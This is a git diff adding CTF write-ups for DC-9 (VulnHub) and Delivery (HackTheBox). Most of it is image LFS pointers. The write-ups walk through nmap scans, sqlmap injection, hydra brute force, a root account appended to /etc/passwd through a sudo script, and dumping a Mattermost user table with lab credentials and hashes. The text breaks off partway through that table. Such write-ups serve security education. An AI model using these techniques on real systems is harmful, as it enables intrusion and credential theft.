https://git-lfs.github.com/spec/v1 +oid sha256:c75f8ec447aebff85e5720f2e61d167b9f5e9f7e8d04f34cd05c71927befe8e0 +size 44343 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp new file mode 100644 index 0000000..98a337f --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b46da451f1ec3b5297501bbc15cde162c4b8839796fd9f71afe068e68106b3bb +size 49582 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png new file mode 100644 index 0000000..3c6d94b --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e24a20580affa6f89c93e15980bbc8ca66f10b227ab398eb36af703262812309 +size 34693 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp new file mode 100644 index 0000000..53e972f --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7af0948bed4fbfd7cc25382689f582ab58f57b020d629f4b1b9da9f9b7493baf +size 29634 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png new file mode 100644 index 0000000..d9a7165 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f722e870e9a9f5282a496e46dcff7bcd56b2ef09d7238e016ea8db2abfe47d38 +size 14486 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp new file mode 100644 index 0000000..a2bd4c7 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f36ae8dac022dec347b4b75b4852258b9494ed86b950f3964268a7e986a4181 +size 16686 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png new file mode 100644 index 0000000..3efb5ed --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9682cabbf189e69301711b3c13ad571d09cb62db12173f2d58f24339e978aadc +size 46986 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp new file mode 100644 index 0000000..e0d673c --- /dev/null 
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70359dc674f6fd1a8dfadf88431c3385eb4ea415f31d3cc21878d0438913d694 +size 56596 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png new file mode 100644 index 0000000..4a089a8 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf4c1fc651464aeea54d376e6f783291caad7faa5e8b71138e8bb8f18292418b +size 61783 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp new file mode 100644 index 0000000..bc61ace --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:61acfc45eb4edd08569b72fe3400813c70614bbd98c942b36c3e41df8d2c7704 +size 19384 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png new file mode 100644 index 0000000..0f6eb63 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f050e714b6fb1bebef61751ff5d3561e0562974f36d23adbf07c22e257ff74d7 +size 106125 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp new file mode 100644 index 0000000..1f1db91 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7943c8181d864f7270ba0d7ab45cf6a77d18605776483ced42019bccd71d942 +size 97866 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png new file mode 100644 index 0000000..0768c4a 
--- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1673635bc02814fee1cdb62fdee4507a1154846e5a05e970c343e3cdeb8ea60c +size 18226 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp new file mode 100644 index 0000000..c3f6ce6 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:caf3d4555784f4e0f416827f055aa2dc8ffedb5cb401163864a560d5fc8ed6a4 +size 19198 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png new file mode 100644 index 0000000..be2e2d1 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05ce225d676c31e1ce407246c1b0bd908a03cc357a53e1c1e4a22c14cb98a792 +size 37564 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp new file mode 100644 index 0000000..b630832 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c4c4b8948bf91d18f195b3b266aa3adec84363fc2b4c40ce80687679740f8a47 +size 62438 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png new file mode 100644 index 0000000..4ad9a5d --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e53a8a590503a62efde7599422bf0d68a8d9464b5a398611737924e786df574 +size 121021 
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp new file mode 100644 index 0000000..77f3ffa --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b034f91dabeef7a81dcaf1bb7a5d3f88d6819ca93f7ce8e96e9473a894c11ef +size 118912 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png new file mode 100644 index 0000000..973df2e --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32710a593d0a2cfb7bd0f632aa9435dcf56c4b9a228f2f3752e18f959ceca5dc +size 10281 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp new file mode 100644 index 0000000..11be4f2 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:182393ed0059bebd361b7b068332befdb64c8a8577f81c4cd15959b3d7744cd0 +size 9636 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png new file mode 100644 index 0000000..d4bc7c8 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db181ed3308cc1640bb896d8004ee4ae970c09c8d8bffb7e52f4c872e0eff62b +size 37448 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp new file mode 100644 index 0000000..ee4ea84 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96697242a1947b571f7a4baba36431a372b3d99c5e346a9549f98b5cbd13e17f +size 31896 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png new file mode 100644 index 0000000..f38674d --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c349d49aea2821aa664f054335ed44e008116687b6b3dac3e0fde72320c8e32f +size 72497 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp new file mode 100644 index 0000000..bffc694 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae9b3879770168212f4f999e9d28278e541e93f35fa7997d94b9edc7d9af07d6 +size 64688 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/index.md b/content/writeup-ctf/writeup-dc-9-vulnhub/index.md new file mode 100644 index 0000000..a57ebc1 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/index.md 
@@ -0,0 +1,135 @@ +--- +title: "Writeup - DC-9 (VulnHub)" +date: 2022-05-10 +slug: "writeup-dc-9-vulnhub" +type: "writeup-ctf" +--- + +This is a writeup for the [DC-9](https://www.vulnhub.com/entry/dc-9,412/) machine from the VulnHub site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 192.168.56.101 +``` +One TCP ports are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.38) + +![](img/image-2.webp) + +## Exploit + +At first I start by making a scan of the website folders. + +![](img/image-3.webp) + +Quite a lot of different pages, I start by making a capture of a request sent by the `search.php` page with the help of Burp. + +I then run a SQL vulnerability scan with `sqlmap`. + + +```bash +sqlmap -r request.txt --dbs --batch +``` +The target is usable, I find 3 databases in the result of the command. I start with `users` : + +![](img/image-4.webp) + +![](img/image-5.webp) + +Many different credentials... Looking in the `Staff` database, I find an admin password hash. + +![](img/image-6.webp) + +So I go on [crackstation](https://crackstation.net/) to try to find it. + +![](img/image-7.webp) + +I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page `manage.php`, there is an error message : `File does not exist`. I wonder if there is not an argument. After some test I find that there is a `file` argument. This allows me to find the following file: + + +```bash +File does not exist +[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn +``` +This is a file that allows you to configure port knocking to unblock the SSH port! 
+ +So I try to realize the sequence with the following commands: + + +```bash +nmap -Pn --max-retries 0 -p 7469 192.168.56.101 +nmap -Pn --max-retries 0 -p 8475 192.168.56.101 +nmap -Pn --max-retries 0 -p 9842 192.168.56.101 +``` +And indeed it worked, I now have access to the SSH port: + +![](img/image-8.webp) + +In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with `hydra` : + +![](img/image-9.webp) + +After a few minutes `hydra` finds several combinations that work. It is by connecting as a `janitor` that I finally find an interesting file: + +![](img/image-10.webp) + +A list of passwords, so I add them to my existing list and I restart `hydra` : + +![](img/image-11.webp) + +A new combination is found! So I connect in SSH. + +## Privilege escalation + +I start by checking the sudo permissions of my user. + +![](img/image-12.webp) + +By executing the script I understand that it uses two arguments: one in reading and the other in writing. + + +```bash +fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test +Usage: python test.py read append +``` +I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command: + + +```bash +fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty +$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1 +``` +I add the line of my user in a temporary file : + + +```bash +fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt +d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash +``` +Then I add my user with the following command: + + +```bash +sudo ./test ~/user.txt /etc/passwd +``` +Finally I change user: + +![](img/image-13.webp) + +I now have a root shell on the machine! 
+ +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the site to avoid SQL injection +- Do not leave an argument `file` if not used +- Do not store clear passwords in a database +- Do not let a script run in root if not necessary diff --git a/content/writeup-ctf/writeup-delivery-htb/featured.png b/content/writeup-ctf/writeup-delivery-htb/featured.png new file mode 100644 index 0000000..e155c1b --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f7262234baf3dd0cdb39325168027ac6ff67e9fca4423ddb01317824fcf28c0 +size 310041 diff --git a/content/writeup-ctf/writeup-delivery-htb/featured.webp b/content/writeup-ctf/writeup-delivery-htb/featured.webp new file mode 100644 index 0000000..e747a36 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9bf898d00b2a0704be5025d42f640dc8afd9704665003657aa4f9c19c4b9904 +size 30300 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-1.png b/content/writeup-ctf/writeup-delivery-htb/img/image-1.png new file mode 100644 index 0000000..801bb70 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9505ecfc74d9f669a4a146566e8618cdf8ee216195cd3ae981338f2b5014b7b6 +size 25076 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp new file mode 100644 index 0000000..6ab32b9 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64d183feb0f353d4c7bd7e9fc979905a40375fcfea69a3ed6a4d3471b8067001 +size 27520 
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-10.png b/content/writeup-ctf/writeup-delivery-htb/img/image-10.png new file mode 100644 index 0000000..1a384a4 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:660bdcd6c7117269aea69138fd65b75396f598d378ce6e93bb07fd073d00488d +size 35354 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp new file mode 100644 index 0000000..d7d6099 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77c22356488b6208d6d96907e95a12b2c529f044364ee75af2da9a2e7afb04c7 +size 45502 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-11.png b/content/writeup-ctf/writeup-delivery-htb/img/image-11.png new file mode 100644 index 0000000..bc6b650 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51931f223f91c55fee25485d412b695aed87cf1933d13f784bf98153f6e77319 +size 9982 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp new file mode 100644 index 0000000..b78a4f4 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76cf9676874f355b866b14f7679a60c8fbd6bc5211f70409d04a42bd554c8bd0 +size 11762 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-2.png b/content/writeup-ctf/writeup-delivery-htb/img/image-2.png new file mode 100644 index 0000000..b21f333 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-2.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:160dca0b384c2923a4ec6feb9024a4b22c461ccdc7e171f907005e5da322ebee +size 1561452 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp new file mode 100644 index 0000000..f3ec2a1 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bad96df211ff777046e28a0356b1838ac7fb4bdbf4645aa40a969ee0bc77c34c +size 34466 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-3.png b/content/writeup-ctf/writeup-delivery-htb/img/image-3.png new file mode 100644 index 0000000..35a159f --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:227ed4ec08cd0ad0abc904f499982bb79b1ed1dc0c5ff2f1c017031c640fb341 +size 75032 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp new file mode 100644 index 0000000..41e2b3c --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:966c7a23bb7de8fcb24db74a8d6fe8653f08820b3440f288a5243f38768fa6f6 +size 38280 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-4.png b/content/writeup-ctf/writeup-delivery-htb/img/image-4.png new file mode 100644 index 0000000..b1a46f4 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5da649dae7e506c0326286c2ca7097d255ca81e4451eea17d427e6314ecd3f00 +size 22649 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp new file mode 100644 index 0000000..ea8c580 --- /dev/null 
+++ b/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:577421982fa2cc4c17bebc8fa1031ab23d2de33dfdd8799f2352af88542e972a +size 17594 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-5.png b/content/writeup-ctf/writeup-delivery-htb/img/image-5.png new file mode 100644 index 0000000..eea5b76 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff6796fb338fc2a5d471c5aedd1336ba62914401112846536538e07036ed7f3f +size 63504 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp new file mode 100644 index 0000000..336bca2 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:826060d8b19832cdb57dcd86d23ea6edb6fe1f807d15f45076b0b23929f4d773 +size 46186 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-6.png b/content/writeup-ctf/writeup-delivery-htb/img/image-6.png new file mode 100644 index 0000000..2260410 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:223568176a1eb5e3a6aca1ca01b5b0cbafe6a7eea3cd9c742eef35ec26262cf3 +size 22609 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp new file mode 100644 index 0000000..6eebda3 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:518af2e113872346508619dd9a91faebe0c40bf77019b083b70ae56fa8fb4d67 +size 13654 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-7.png b/content/writeup-ctf/writeup-delivery-htb/img/image-7.png new file mode 100644 index 0000000..dc9815a 
--- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef1663cf0940409fdf0276584b80b6d5e7b4f1dce51fd6b813616ca1b3f9d18c +size 49865 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp new file mode 100644 index 0000000..6fc999c --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39cdcea7bca913f7e4cca527ba934ab85680e1c9bb7a2d9af662106515255f9b +size 35364 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-8.png b/content/writeup-ctf/writeup-delivery-htb/img/image-8.png new file mode 100644 index 0000000..050ec21 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e516863c8181b6d0a80f175d851f991d8760ac96498b4244b2403c9e1d1f2837 +size 19230 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp new file mode 100644 index 0000000..161f6c1 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6960e0fdd979b157eebe309779ad4c908f54add36427d187409290854403313a +size 12382 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-9.png b/content/writeup-ctf/writeup-delivery-htb/img/image-9.png new file mode 100644 index 0000000..d29ef8a --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ae5e2be1c17c432025a5ff5b46676e9069d6fba9fad2086b19cea3acde3e6dc +size 45539 
diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp new file mode 100644 index 0000000..4dc4eee --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd06676afc3a924198c36568a61f63ba3760c12d48b6d42f27bb8869b3032f4b +size 32840 diff --git a/content/writeup-ctf/writeup-delivery-htb/index.md b/content/writeup-ctf/writeup-delivery-htb/index.md new file mode 100644 index 0000000..43aaac6 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/index.md 
@@ -0,0 +1,169 @@ +--- +title: "Writeup - Delivery (HTB)" +date: 2022-03-27 +slug: "writeup-delivery-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Delivery](https://app.hackthebox.com/machines/Delivery) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.146 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.9p1) +- 80/tcp : HTTP web server (nginx 1.14.2) +- 8065/tcp : ???? + +![](img/image-2.webp) + +## Exploit + +After checking the site, I quickly found the `helpdesk` section. It is a site that allows the sending of tickets to support. + +![](img/image-3.webp) + +I first try to create an account, but it's impossible, I need the validation of an admin to confirm the account. Then I try to create a ticket: + +![](img/image-4.webp) + +I then go to view it using my email and my ticket number, I arrive on the following page: + +![](img/image-5.webp) + +In parallel I go to visit the third open port and I find the following page: + +![](img/image-6.webp) + +I try to create an account, but the site asks me to validate the account via email. I first try to use a temporary email, but I get no confirmation. Then I notice that when I create a helpdesk ticket, it is indicated that I can send emails to the address `3998604@delivery.htb` to add additional information to the ticket. So I use this address when creating the account and when validating I go back to the ticket site and find the following message: + +![](img/image-7.webp) + +I can now validate my account and log in. I get the following page: + +![](img/image-8.webp) + +After a little exploration I came across this discussion: + +![](img/image-9.webp) + +There is a login/password let's try to use it to connect in SSH: + +![](img/image-10.webp) + +Ok I now have a shell in `maildeliverer` time and I can get the first flag. 
+ +## Privilege escalation + +I know that the chat application is `mattermost` and that the configuration files for this application are in the `/opt/mattermost`folder. So I start to inspect these files. I find the config file where there are credentials for the access to the database: + + +```bash +"SqlSettings": { + "DriverName": "mysql", + "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTi$ + "DataSourceReplicas": [], + "DataSourceSearchReplicas": [], + "MaxIdleConns": 20, + "ConnMaxLifetimeMilliseconds": 3600000, + "MaxOpenConns": 300, + "Trace": false, + "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez", + "QueryTimeout": 30, + "DisableDatabaseSearch": false + }, +``` +I connect with the following command: + + +```bash +mysql -u mmuser -p Crack_The_MM_Admin_PW -D mattermost +``` +I first list the tables: + + +```bash +MariaDB [mattermost]> show TABLES; ++------------------------+ +| Tables_in_mattermost | ++------------------------+ +| Audits | +| Bots | +| ChannelMemberHistory | +[...] 
+| Threads | +| Tokens | +| UploadSessions | +| UserAccessTokens | +| UserGroups | +| UserTermsOfService | +| Users | ++------------------------+ +``` +Then I display the data of the Users `Users` : + + +```bash +MariaDB [mattermost]> SELECT * FROM Users; ++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ +| Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret | ++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ +| 
64nq8nue7pyhpgwm99a949mwya | 1608992663714 | 1608992663731 | 0 | surveybot | | NULL | | surveybot@localhost | 0 | | Surveybot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663714 | 1608992663731 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 | 0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL | | 4120849@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844799823 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 | 0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL | | 7466068@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844806814 | 0 